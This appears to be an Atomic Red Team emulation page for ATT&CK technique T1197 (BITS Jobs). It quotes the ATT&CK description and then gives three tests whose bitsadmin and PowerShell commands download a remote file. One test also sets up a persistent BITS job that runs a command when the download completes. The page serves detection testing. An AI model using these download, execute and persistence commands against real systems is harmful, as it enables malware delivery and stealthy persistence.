# T1197 - BITS Jobs
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
<blockquote>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1086)  (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)</blockquote>

## Atomic Tests

- [Atomic Test #1 - Bitsadmin Download (cmd)](#atomic-test-1---bitsadmin-download-cmd)

- [Atomic Test #2 - Bitsadmin Download (PowerShell)](#atomic-test-2---bitsadmin-download-powershell)

- [Atomic Test #3 - Persist, Download, & Execute](#atomic-test-3---persist-download--execute)


<br/>

## Atomic Test #1 - Bitsadmin Download (cmd)
This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | %temp%&#92;bitsadmin_flag.ps1|


#### Attack Commands: Run with `command_prompt`! 


```cmd
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
```

#### Cleanup Commands:
```cmd
del #{local_file} >nul 2>&1
```





<br/>
<br/>

## Atomic Test #2 - Bitsadmin Download (PowerShell)
This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload leveraging PowerShell

Upon execution you will find a github markdown file downloaded to the Temp directory

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | $env:TEMP&#92;bitsadmin_flag.ps1|


#### Attack Commands: Run with `powershell`! 


```powershell
Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
```

#### Cleanup Commands:
```powershell
Remove-Item #{local_file} -ErrorAction Ignore
```





<br/>
<br/>

## Atomic Test #3 - Persist, Download, & Execute
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| bits_job_name | Name of BITS job | string | AtomicBITS|
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | %temp%&#92;bitsadmin_flag.ps1|
| command_path | Path of command to execute | path | C:&#92;Windows&#92;system32&#92;notepad.exe|
| command_line | Command line to execute | string | %temp%&#92;bitsadmin_flag.ps1|


#### Attack Commands: Run with `command_prompt`! 


```cmd
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}
```






<br/>
